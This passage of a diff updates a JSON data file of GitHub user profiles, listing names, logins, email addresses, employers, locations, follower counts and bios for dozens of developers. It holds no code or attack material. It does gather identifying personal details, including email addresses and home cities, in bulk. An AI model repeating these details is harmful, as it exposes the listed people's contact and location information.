"login": "dvelardez", + "nest_created_at": "2024-09-22T09:34:19.823Z", + "nest_updated_at": "2024-09-22T19:33:22.330Z", + "name": "Érico Andrei", + "login": "ericof", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11647838?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/306014?v=4", + "company": "@plone ", + "location": "São Paulo, Brazil", + "collaborators_count": 0, + "following_count": 63, + "followers_count": 211, + "public_gists_count": 12, + "public_repositories_count": 81, + "created_at": "2010-06-15T17:01:48Z", + "updated_at": "2024-08-12T13:56:16Z", + "node_id": "MDQ6VXNlcjMwNjAxNA==", + "bio": "Python Software Foundation Fellow, former Plone Foundation President, cookiecutter contributor.", + "is_hireable": true, + "twitter_username": "ericof" + } +}, +{ + "model": "github.user", + "pk": 7558, + "fields": { + "nest_created_at": "2024-09-22T09:34:20.139Z", + "nest_updated_at": "2024-09-22T19:33:22.650Z", + "name": "Serghei Iakovlev", + "login": "sergeyklay", + "email": "egrep@protonmail.ch", + "avatar_url": "https://avatars.githubusercontent.com/u/1256298?v=4", + "company": "@airslateinc @airslate-oss ", + "location": "Wrocław, Poland", "collaborators_count": 0, "following_count": 4, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2015-03-25T12:48:40Z", - "updated_at": "2024-08-07T15:21:34Z", - "node_id": "MDQ6VXNlcjExNjQ3ODM4", + "followers_count": 479, + "public_gists_count": 27, + "public_repositories_count": 82, + "created_at": "2011-12-12T01:28:31Z", + "updated_at": "2024-09-14T08:27:25Z", + "node_id": "MDQ6VXNlcjEyNTYyOTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -415878,49 +674877,49 @@ }, { "model": "github.user", - "pk": 2226, + "pk": 7559, "fields": { - "nest_created_at": "2024-09-12T01:12:06.958Z", - "nest_updated_at": "2024-09-12T01:12:08.176Z", - "name": "Nathan Voss", - "login": "njv299", - "email": "njvoss299@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/210219?v=4", - "company": "Finite State, Inc.", - "location": "Prescott, AZ", + "nest_created_at": "2024-09-22T09:34:20.479Z", + "nest_updated_at": "2024-09-22T19:33:22.966Z", + "name": "Seungbin Oh (오승빈)", + "login": "sboh1214", + "email": "sboh1214@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/30364442?v=4", + "company": "@sparcs-kaist", + "location": "Daejeon, South Korea", "collaborators_count": 0, - "following_count": 7, - "followers_count": 29, - "public_gists_count": 5, - "public_repositories_count": 4, - "created_at": "2010-02-24T20:27:03Z", - "updated_at": "2024-03-26T21:33:08Z", - "node_id": "MDQ6VXNlcjIxMDIxOQ==", - "bio": "Senior Engineer and Cyber Researcher at Finite State Inc, an IoT security company", + "following_count": 95, + "followers_count": 68, + "public_gists_count": 2, + "public_repositories_count": 43, + "created_at": "2017-07-22T06:45:29Z", + "updated_at": "2024-09-14T18:28:56Z", + "node_id": "MDQ6VXNlcjMwMzY0NDQy", + "bio": "2022 President, 2023-2024 Planning Lead, 2023-2024 OTL Tech Lead @sparcs-kaist ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "sboh1214" } }, { "model": "github.user", - "pk": 2227, + "pk": 7560, "fields": { - "nest_created_at": "2024-09-12T01:12:09.473Z", - "nest_updated_at": "2024-09-12T01:12:09.473Z", - "name": "", - "login": "stars693", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33175562?v=4", + "nest_created_at": "2024-09-22T09:34:20.790Z", + "nest_updated_at": "2024-09-22T19:33:23.283Z", + "name": "Shardul Mahadik", + "login": "shardulm94", + "email": "smahadik@linkedin.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6961317?v=4", "company": "", - "location": "", + "location": "India", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-10-28T10:05:43Z", - "updated_at": "2024-03-14T19:15:26Z", - "node_id": "MDQ6VXNlcjMzMTc1NTYy", + "followers_count": 18, + "public_gists_count": 1, + "public_repositories_count": 35, + "created_at": "2014-03-15T17:40:27Z", + "updated_at": "2024-07-09T07:36:03Z", + "node_id": "MDQ6VXNlcjY5NjEzMTc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -415928,249 +674927,274 @@ }, { "model": "github.user", - "pk": 2228, + "pk": 7561, "fields": { - "nest_created_at": "2024-09-12T01:12:10.759Z", - "nest_updated_at": "2024-09-12T02:31:04.793Z", - "name": "", - "login": "spmishra121", + "nest_created_at": "2024-09-22T09:34:21.129Z", + "nest_updated_at": "2024-09-22T19:33:23.601Z", + "name": "Shubham mittal", + "login": "upgoingstar", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6615148?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3412841?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-02-07T11:46:10Z", - "updated_at": "2023-02-24T07:53:49Z", - "node_id": "MDQ6VXNlcjY2MTUxNDg=", - "bio": "", + "following_count": 2, + "followers_count": 263, + "public_gists_count": 2, + "public_repositories_count": 40, + "created_at": "2013-01-29T04:02:10Z", + "updated_at": "2024-09-19T07:30:56Z", + "node_id": "MDQ6VXNlcjM0MTI4NDE=", + "bio": "#SecurityConsultant #pentester\r\nProject Lead of @DataSploit \r\nFounder @ReconVillage ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2229, + "pk": 7562, "fields": { - "nest_created_at": "2024-09-12T01:12:12.024Z", - "nest_updated_at": "2024-09-12T01:14:18.974Z", - "name": "Alejandro Mendiondo", - "login": "devsecopsale", + "nest_created_at": "2024-09-22T09:34:21.451Z", + "nest_updated_at": "2024-09-22T19:33:23.920Z", + "name": "Sofiane Gargouri", + "login": "sofianegargouri", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/80888956?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4323986?v=4", + "company": "@derniercri", + "location": "France", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2021-03-18T09:54:42Z", - "updated_at": "2024-08-08T12:47:20Z", - "node_id": "MDQ6VXNlcjgwODg4OTU2", - "bio": "", - "is_hireable": false, + "following_count": 20, + "followers_count": 15, + "public_gists_count": 3, + "public_repositories_count": 6, + "created_at": "2013-05-02T17:11:27Z", + "updated_at": "2024-09-17T17:05:57Z", + "node_id": "MDQ6VXNlcjQzMjM5ODY=", + "bio": "Creator of @queueup, @xanyah, @pletos-esports - Software Engineer @derniercri", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2230, + "pk": 7563, "fields": { - "nest_created_at": "2024-09-12T01:12:14.533Z", - "nest_updated_at": "2024-09-12T01:12:14.533Z", - "name": "Matt Medus", - "login": "mattmedus", + "nest_created_at": "2024-09-22T09:34:22.090Z", + "nest_updated_at": "2024-09-22T19:33:24.576Z", + "name": "Stefan Fejes", + "login": "fejes713", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/58269748?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/25749162?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-11-27T17:59:09Z", - "updated_at": "2024-07-08T21:36:00Z", - "node_id": "MDQ6VXNlcjU4MjY5NzQ4", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 51, + "followers_count": 510, + "public_gists_count": 1, + "public_repositories_count": 18, + "created_at": "2017-02-13T16:43:13Z", + "updated_at": "2024-09-21T02:59:14Z", + "node_id": "MDQ6VXNlcjI1NzQ5MTYy", + "bio": " ⏰ Co-founder of @30-seconds\r\n🎙Speaker 🏆Open Source Awards @GitNation 👨🏼‍💻 Product & Engineering @veedstudio at $20M+ ARR 🍰 Prev. @github", + "is_hireable": true, + "twitter_username": "fejes713" } }, { "model": "github.user", - "pk": 2231, + "pk": 7564, "fields": { - "nest_created_at": "2024-09-12T01:12:15.358Z", - "nest_updated_at": "2024-09-12T01:12:15.358Z", - "name": "", - "login": "pmagnemi20", + "nest_created_at": "2024-09-22T09:34:22.436Z", + "nest_updated_at": "2024-09-22T19:33:24.922Z", + "name": "Stephen Chan", + "login": "sscchan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/67282783?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12063755?v=4", + "company": "Amazon", + "location": "Seattle, Washington", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 10, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2020-06-22T16:08:34Z", - "updated_at": "2024-09-09T11:31:37Z", - "node_id": "MDQ6VXNlcjY3MjgyNzgz", - "bio": "", - "is_hireable": false, + "public_repositories_count": 34, + "created_at": "2015-04-22T07:42:28Z", + "updated_at": "2024-08-28T06:25:35Z", + "node_id": "MDQ6VXNlcjEyMDYzNzU1", + "bio": "Software Engineer", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2232, + "pk": 7565, "fields": { - "nest_created_at": "2024-09-12T01:12:16.620Z", - "nest_updated_at": "2024-09-12T01:12:16.620Z", - "name": "Bruno", - "login": "bruno561", + "nest_created_at": "2024-09-22T09:34:22.744Z", + "nest_updated_at": "2024-09-22T19:33:25.251Z", + "name": "Suhun Han", + "login": "ssut", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/65369082?v=4", - "company": "", - "location": "São Paulo - SP, Brazil", + "avatar_url": "https://avatars.githubusercontent.com/u/2366668?v=4", + "company": "@brandazine", + "location": "Seoul, Republic of Korea", "collaborators_count": 0, - "following_count": 5, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 21, - "created_at": "2020-05-14T20:28:23Z", - "updated_at": "2024-07-26T18:41:56Z", - "node_id": "MDQ6VXNlcjY1MzY5MDgy", - "bio": "DevOps Engineer", - "is_hireable": false, + "following_count": 24, + "followers_count": 332, + "public_gists_count": 33, + "public_repositories_count": 121, + "created_at": "2012-09-18T01:28:56Z", + "updated_at": "2024-09-21T10:34:59Z", + "node_id": "MDQ6VXNlcjIzNjY2Njg=", + "bio": "@brandazine Lead Software Engineer. TypeScript and Go enthusiast.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2233, + "pk": 7566, "fields": { - "nest_created_at": "2024-09-12T01:12:17.867Z", - "nest_updated_at": "2024-09-12T01:12:17.867Z", - "name": "Jan Socha", - "login": "js0cha", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/92743635?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:34:23.062Z", + "nest_updated_at": "2024-09-22T19:33:25.580Z", + "name": "Teddy Reed", + "login": "theopolis", + "email": "teddy@casualhacking.io", + "avatar_url": "https://avatars.githubusercontent.com/u/981645?v=4", + "company": "@lacework ", + "location": "New York, NY", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2021-10-18T15:56:49Z", - "updated_at": "2024-05-13T08:05:43Z", - "node_id": "U_kgDOBYcn0w", - "bio": "", + "following_count": 22, + "followers_count": 487, + "public_gists_count": 7, + "public_repositories_count": 78, + "created_at": "2011-08-15T18:29:59Z", + "updated_at": "2024-09-16T16:25:55Z", + "node_id": "MDQ6VXNlcjk4MTY0NQ==", + "bio": "Mostly security, trusted computing, OS, embedded focuses; always for fun. (he/him)", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2234, + "pk": 7567, "fields": { - "nest_created_at": "2024-09-12T01:12:20.344Z", - "nest_updated_at": "2024-09-12T01:12:20.344Z", - "name": "", - "login": "alexr3", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/84767766?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:34:23.374Z", + "nest_updated_at": "2024-09-22T19:33:25.895Z", + "name": "Tierney Cyren", + "login": "bnb", + "email": "hello@bnb.im", + "avatar_url": "https://avatars.githubusercontent.com/u/502396?v=4", + "company": "@twilio", + "location": "nyc", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 78, - "created_at": "2021-05-25T07:26:04Z", - "updated_at": "2024-08-12T12:24:24Z", - "node_id": "MDQ6VXNlcjg0NzY3NzY2", - "bio": "", + "following_count": 12, + "followers_count": 1756, + "public_gists_count": 116, + "public_repositories_count": 234, + "created_at": "2010-11-29T20:27:28Z", + "updated_at": "2024-09-16T14:02:27Z", + "node_id": "MDQ6VXNlcjUwMjM5Ng==", + "bio": "principal developer advocate at @twilio. prev: @microsoft. works on: @nodejs. @electronjs. web2 boomer. adhd. demiboy.", + "is_hireable": true, + "twitter_username": "bitandbang" + } +}, +{ + "model": "github.user", + "pk": 7568, + "fields": { + "nest_created_at": "2024-09-22T09:34:23.690Z", + "nest_updated_at": "2024-09-22T19:33:26.217Z", + "name": "Tobias Bieniek", + "login": "Turbo87", + "email": "tobias@bieniek.cloud", + "avatar_url": "https://avatars.githubusercontent.com/u/141300?v=4", + "company": "@rustfoundation", + "location": "Aachen, Germany", + "collaborators_count": 0, + "following_count": 67, + "followers_count": 567, + "public_gists_count": 39, + "public_repositories_count": 640, + "created_at": "2009-10-18T14:15:25Z", + "updated_at": "2024-08-16T06:35:49Z", + "node_id": "MDQ6VXNlcjE0MTMwMA==", + "bio": "👨‍✈️ glider pilot – 🦀 crates.io team co-lead – 🐹 Ember CLI team emeritus", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2235, + "pk": 7569, "fields": { - "nest_created_at": "2024-09-12T01:12:21.182Z", - "nest_updated_at": "2024-09-12T01:12:43.874Z", - "name": "reddybhaskar", - "login": "reddybhaskarvengala", + "nest_created_at": "2024-09-22T09:34:24.003Z", + "nest_updated_at": "2024-09-22T19:33:26.526Z", + "name": "Tom Kerkhove", + "login": "tomkerkhove", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26956032?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4345663?v=4", + "company": "Microsoft", + "location": "Belgium", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2017-04-06T07:07:56Z", - "updated_at": "2024-04-15T12:00:57Z", - "node_id": "MDQ6VXNlcjI2OTU2MDMy", - "bio": "", + "following_count": 370, + "followers_count": 621, + "public_gists_count": 117, + "public_repositories_count": 194, + "created_at": "2013-05-05T11:26:54Z", + "updated_at": "2024-08-07T07:18:03Z", + "node_id": "MDQ6VXNlcjQzNDU2NjM=", + "bio": "Senior software engineer on Azure API Management.\r\n\r\nMaintainer of KEDA & Promitor", "is_hireable": false, - "twitter_username": "" + "twitter_username": "TomKerkhove" } }, { "model": "github.user", - "pk": 2236, + "pk": 7570, "fields": { - "nest_created_at": "2024-09-12T01:12:22.416Z", - "nest_updated_at": "2024-09-12T01:12:22.416Z", - "name": "", - "login": "PKulkov", + "nest_created_at": "2024-09-22T09:34:24.339Z", + "nest_updated_at": "2024-09-22T19:33:26.841Z", + "name": "Tom Payne", + "login": "twpayne", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/63711768?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6942?v=4", "company": "", - "location": "", + "location": "Zürich, Switzerland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-04-15T09:17:31Z", - "updated_at": "2023-01-13T19:05:46Z", - "node_id": "MDQ6VXNlcjYzNzExNzY4", - "bio": "", + "following_count": 74, + "followers_count": 4270, + "public_gists_count": 16, + "public_repositories_count": 158, + "created_at": "2008-04-12T14:22:40Z", + "updated_at": "2024-09-11T13:50:28Z", + "node_id": "MDQ6VXNlcjY5NDI=", + "bio": "Creator of chezmoi.io. Gopher, paraglider pilot, and geospatial developer.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2237, + "pk": 7571, "fields": { - "nest_created_at": "2024-09-12T01:12:23.646Z", - "nest_updated_at": "2024-09-12T01:12:23.646Z", - "name": "Ma1tobiose", - "login": "Ma1tobiose", + "nest_created_at": "2024-09-22T09:34:24.682Z", + "nest_updated_at": "2024-09-22T19:33:27.151Z", + "name": "", + "login": "dvz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9525648?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8020837?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 37, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 54, - "created_at": "2014-11-03T05:49:51Z", - "updated_at": "2024-08-22T11:36:38Z", - "node_id": "MDQ6VXNlcjk1MjU2NDg=", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 23, + "created_at": "2014-06-29T21:40:37Z", + "updated_at": "2024-08-14T23:48:50Z", + "node_id": "MDQ6VXNlcjgwMjA4Mzc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -416178,74 +675202,74 @@ }, { "model": "github.user", - "pk": 2238, + "pk": 7572, "fields": { - "nest_created_at": "2024-09-12T01:12:27.370Z", - "nest_updated_at": "2024-09-12T01:19:37.338Z", - "name": "Giveen", - "login": "giveen", - "email": "ajaxx20020@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1180939?v=4", - "company": "", - "location": "Idaho", + "nest_created_at": "2024-09-22T09:34:25.016Z", + "nest_updated_at": "2024-09-22T19:33:27.483Z", + "name": "Valentin Vieriu", + "login": "valentinvieriu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/478866?v=4", + "company": "@SAP @kyma-project @art42net ", + "location": "Munich, Germany", "collaborators_count": 0, - "following_count": 17, - "followers_count": 17, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2011-11-08T15:21:19Z", - "updated_at": "2024-02-22T03:01:43Z", - "node_id": "MDQ6VXNlcjExODA5Mzk=", + "following_count": 38, + "followers_count": 43, + "public_gists_count": 12, + "public_repositories_count": 4, + "created_at": "2010-11-12T13:50:37Z", + "updated_at": "2024-09-22T06:20:44Z", + "node_id": "MDQ6VXNlcjQ3ODg2Ng==", "bio": "", - "is_hireable": true, - "twitter_username": "giveen" + "is_hireable": false, + "twitter_username": "valentinvieriu" } }, { "model": "github.user", - "pk": 2239, + "pk": 7573, "fields": { - "nest_created_at": "2024-09-12T01:12:30.698Z", - "nest_updated_at": "2024-09-12T02:07:46.755Z", - "name": "", - "login": "twright-0x1", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13889385?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:34:25.322Z", + "nest_updated_at": "2024-09-22T19:33:27.796Z", + "name": "Vincenzo Chianese", + "login": "XVincentX", + "email": "vincenz.chianese@icloud.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1416224?v=4", + "company": "@microsoft", + "location": "Denver, CO", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2015-08-20T15:24:05Z", - "updated_at": "2024-08-09T13:54:55Z", - "node_id": "MDQ6VXNlcjEzODg5Mzg1", - "bio": "", + "followers_count": 0, + "public_gists_count": 5, + "public_repositories_count": 29, + "created_at": "2012-02-07T14:20:36Z", + "updated_at": "2024-09-08T19:43:30Z", + "node_id": "MDQ6VXNlcjE0MTYyMjQ=", + "bio": "I do APIs and Clojure at @microsoftgraph. Formerly @stoplightio, @lunchbadger, @oracle, @apiaryio, @Sentinel-One", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2240, + "pk": 7574, "fields": { - "nest_created_at": "2024-09-12T01:12:32.041Z", - "nest_updated_at": "2024-09-12T01:12:32.041Z", + "nest_created_at": "2024-09-22T09:34:26.069Z", + "nest_updated_at": "2024-09-22T19:33:28.482Z", "name": "", - "login": "nc-esi", + "login": "AEnterprise", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/122610802?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5206666?v=4", "company": "", - "location": "", + "location": "right here", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-01-13T11:33:28Z", - "updated_at": "2023-01-13T11:33:28Z", - "node_id": "U_kgDOB07kcg", + "following_count": 7, + "followers_count": 192, + "public_gists_count": 51, + "public_repositories_count": 63, + "created_at": "2013-08-11T08:24:44Z", + "updated_at": "2024-09-21T11:26:06Z", + "node_id": "MDQ6VXNlcjUyMDY2NjY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -416253,24 +675277,24 @@ }, { "model": "github.user", - "pk": 2241, + "pk": 7575, "fields": { - "nest_created_at": "2024-09-12T01:12:33.287Z", - "nest_updated_at": "2024-09-12T01:12:33.287Z", - "name": "", - "login": "surajram09", + "nest_created_at": "2024-09-22T09:34:26.378Z", + "nest_updated_at": "2024-09-22T19:33:28.823Z", + "name": "Cemal", + "login": "Moneypulation", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23093486?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/33369079?v=4", "company": "", - "location": "", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 13, + "followers_count": 14, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2016-10-27T06:53:05Z", - "updated_at": "2024-04-17T04:12:42Z", - "node_id": "MDQ6VXNlcjIzMDkzNDg2", + "public_repositories_count": 13, + "created_at": "2017-11-04T09:01:45Z", + "updated_at": "2023-09-14T11:21:57Z", + "node_id": "MDQ6VXNlcjMzMzY5MDc5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -416278,74 +675302,74 @@ }, { "model": "github.user", - "pk": 2242, + "pk": 7576, "fields": { - "nest_created_at": "2024-09-12T01:12:35.371Z", - "nest_updated_at": "2024-09-12T01:12:35.371Z", - "name": "", - "login": "nobletrout", + "nest_created_at": "2024-09-22T09:34:26.706Z", + "nest_updated_at": "2024-09-22T19:33:29.146Z", + "name": "Christian Müller", + "login": "kitsunet", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16596040?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/324408?v=4", + "company": "Flownative", "location": "", "collaborators_count": 0, - "following_count": 8, - "followers_count": 9, - "public_gists_count": 5, - "public_repositories_count": 47, - "created_at": "2016-01-07T15:54:18Z", - "updated_at": "2024-06-19T01:44:48Z", - "node_id": "MDQ6VXNlcjE2NTk2MDQw", - "bio": "", + "following_count": 11, + "followers_count": 110, + "public_gists_count": 61, + "public_repositories_count": 89, + "created_at": "2010-07-06T15:57:25Z", + "updated_at": "2024-04-10T17:40:14Z", + "node_id": "MDQ6VXNlcjMyNDQwOA==", + "bio": "@Flownative partner and team member of the @neos project.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2243, + "pk": 7577, "fields": { - "nest_created_at": "2024-09-12T01:12:36.752Z", - "nest_updated_at": "2024-09-12T01:12:36.752Z", - "name": "Omar Mochtar", - "login": "iomarmochtar", - "email": "iomarmochtar@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6241878?v=4", + "nest_created_at": "2024-09-22T09:34:27.051Z", + "nest_updated_at": "2024-09-22T19:33:29.458Z", + "name": "Meowcino", + "login": "Puppercino", + "email": "jordyalexlyall@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/19499924?v=4", "company": "", - "location": "Indonesia", + "location": "Australia", "collaborators_count": 0, - "following_count": 94, - "followers_count": 25, - "public_gists_count": 28, - "public_repositories_count": 38, - "created_at": "2013-12-22T15:42:10Z", - "updated_at": "2024-07-24T10:49:40Z", - "node_id": "MDQ6VXNlcjYyNDE4Nzg=", - "bio": "", - "is_hireable": true, - "twitter_username": "" + "following_count": 10, + "followers_count": 18, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2016-05-21T02:56:21Z", + "updated_at": "2024-09-20T11:41:53Z", + "node_id": "MDQ6VXNlcjE5NDk5OTI0", + "bio": "Web Design, Software Development, Computer Cats. \r\nPFP: television", + "is_hireable": false, + "twitter_username": "canned_dev" } }, { "model": "github.user", - "pk": 2244, + "pk": 7578, "fields": { - "nest_created_at": "2024-09-12T01:12:38.025Z", - "nest_updated_at": "2024-09-12T01:12:38.025Z", + "nest_created_at": "2024-09-22T09:34:27.375Z", + "nest_updated_at": "2024-09-22T19:33:29.792Z", "name": "", - "login": "Kedlix", + "login": "CrazyMarvin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39012231?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/15004217?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 23, + "followers_count": 36, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-05-05T18:07:28Z", - "updated_at": "2023-02-08T14:29:17Z", - "node_id": "MDQ6VXNlcjM5MDEyMjMx", + "public_repositories_count": 3, + "created_at": "2015-10-06T20:46:11Z", + "updated_at": "2024-09-16T11:14:20Z", + "node_id": "MDQ6VXNlcjE1MDA0MjE3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -416353,74 +675377,74 @@ }, { "model": "github.user", - "pk": 2245, + "pk": 7579, "fields": { - "nest_created_at": "2024-09-12T01:12:38.862Z", - "nest_updated_at": "2024-09-12T01:12:38.862Z", - "name": "Tobias Stadler", - "login": "tobiasstadler", - "email": "ts.stadler@gmx.de", - "avatar_url": "https://avatars.githubusercontent.com/u/22965777?v=4", + "nest_created_at": "2024-09-22T09:34:27.691Z", + "nest_updated_at": "2024-09-22T19:33:30.109Z", + "name": "DaCoD", + "login": "dacod", + "email": "daian.conrad@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1767387?v=4", "company": "", - "location": "Eitting, Germany", + "location": "Palhoça - SC - Brasil", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, + "following_count": 15, + "followers_count": 12, "public_gists_count": 0, - "public_repositories_count": 27, - "created_at": "2016-10-20T18:40:15Z", - "updated_at": "2024-08-26T04:38:50Z", - "node_id": "MDQ6VXNlcjIyOTY1Nzc3", - "bio": "", + "public_repositories_count": 90, + "created_at": "2012-05-22T22:38:52Z", + "updated_at": "2024-09-17T17:32:36Z", + "node_id": "MDQ6VXNlcjE3NjczODc=", + "bio": "A simple Nerd trying to live in this world", "is_hireable": false, - "twitter_username": "" + "twitter_username": "dacod" } }, { "model": "github.user", - "pk": 2246, + "pk": 7580, "fields": { - "nest_created_at": "2024-09-12T01:12:40.132Z", - "nest_updated_at": "2024-09-12T01:12:40.132Z", - "name": "", - "login": "sjs6776", + "nest_created_at": "2024-09-22T09:34:28.015Z", + "nest_updated_at": "2024-09-22T19:33:30.418Z", + "name": "Dan Graham", + "login": "dpgraham", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/103534016?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/852574?v=4", + "company": "Sauce Labs (@appium Team)", + "location": "Vancouver, BC, Canada", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2022-04-12T19:41:51Z", - "updated_at": "2023-07-20T22:09:33Z", - "node_id": "U_kgDOBivNwA", - "bio": "", + "following_count": 12, + "followers_count": 120, + "public_gists_count": 50, + "public_repositories_count": 79, + "created_at": "2011-06-15T19:43:12Z", + "updated_at": "2024-08-23T11:24:38Z", + "node_id": "MDQ6VXNlcjg1MjU3NA==", + "bio": "Appium Developer at Sauce Labs.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2247, + "pk": 7581, "fields": { - "nest_created_at": "2024-09-12T01:12:41.353Z", - "nest_updated_at": "2024-09-12T01:14:29.698Z", - "name": "Ender Akbas", - "login": "enderax", + "nest_created_at": "2024-09-22T09:34:28.329Z", + "nest_updated_at": "2024-09-22T19:33:30.727Z", + "name": "Dan Strong", + "login": "strongoose", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9071412?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6664881?v=4", "company": "", - "location": "", + "location": "Manchester, UK", "collaborators_count": 0, - "following_count": 53, - "followers_count": 38, - "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2014-10-08T07:21:59Z", - "updated_at": "2024-08-08T11:28:06Z", - "node_id": "MDQ6VXNlcjkwNzE0MTI=", + "following_count": 15, + "followers_count": 6, + "public_gists_count": 12, + "public_repositories_count": 63, + "created_at": "2014-02-12T19:14:13Z", + "updated_at": "2024-09-19T11:31:18Z", + "node_id": "MDQ6VXNlcjY2NjQ4ODE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -416428,49 +675452,74 @@ }, { "model": "github.user", - "pk": 2248, + "pk": 7582, "fields": { - "nest_created_at": "2024-09-12T01:12:52.234Z", - "nest_updated_at": "2024-09-12T01:12:52.234Z", - "name": "Chaz", - "login": "cleong14", + "nest_created_at": "2024-09-22T09:34:28.694Z", + "nest_updated_at": "2024-09-22T19:33:31.035Z", + "name": "Daniël Klabbers", + "login": "luceos", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13462818?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/504687?v=4", + "company": "@flarum", "location": "", "collaborators_count": 0, - "following_count": 51, - "followers_count": 40, - "public_gists_count": 12, - "public_repositories_count": 239, - "created_at": 